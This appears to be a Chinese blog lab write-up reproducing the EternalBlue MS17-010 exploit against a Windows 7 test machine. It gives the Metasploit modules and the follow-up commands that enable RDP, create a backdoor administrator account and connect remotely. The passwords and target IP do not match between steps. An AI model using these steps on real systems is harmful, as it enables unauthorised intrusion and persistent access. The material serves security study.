永恒之蓝MS17-010漏洞复现

发布时间 2023-09-28 10:26:17作者: 跳跳虎1

永恒之蓝MS17-010漏洞复现

实验目的

利用永恒之蓝漏洞获取靶机控制权限并打开3389实现远程连接

实验环境

攻击机:kali(192.168.92.20) 靶机:win7 (192.168.92.31)

实验准备

关闭靶机防火墙

image-20230927163324120

查看靶机445、139端口开放情况

image-20230927164857295

开始攻击

使用kali内置msf查询攻击模块

image-20230927163737134

使用该模块查询靶机是否存在漏洞

auxiliary/scanner/smb/smb_ms17_010
image-20230927163927342

然后使用该模块进行攻击

exploit/windows/smb/ms17_010_eternalblue
image-20230927164317125

尝试对靶机截图

meterpreter > screenshot
image-20230927164951552

成功拿到靶机权限

进入靶机shell

image-20230927204745050

解决shell命令返回乱码问题

chcp 65001

接下来利用拿到权限开启靶机3389端口

使用命令打开靶机3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

image-20230927170540079

查询3389端口状态

netstat -ano|findstr "3389"
image-20230927202413262

使用命令添加用户

net user hack 123123 /add

将所添加用户添加到管理员组

net localgroup administrators hack /add

使用命令远程连接

rdesktop -u hack -p 123456

或者

xfreerdp /u:hack /p:123456 /v:192.168.16.46

连接成功

image-20230927204036427

注意:在使用rdesktop出现如下错误

image-20230927204225616

或使用xfreerdp出现

image-20230927204343452

输入

export DISPLAY=:0

export DISPLAY=:1

即可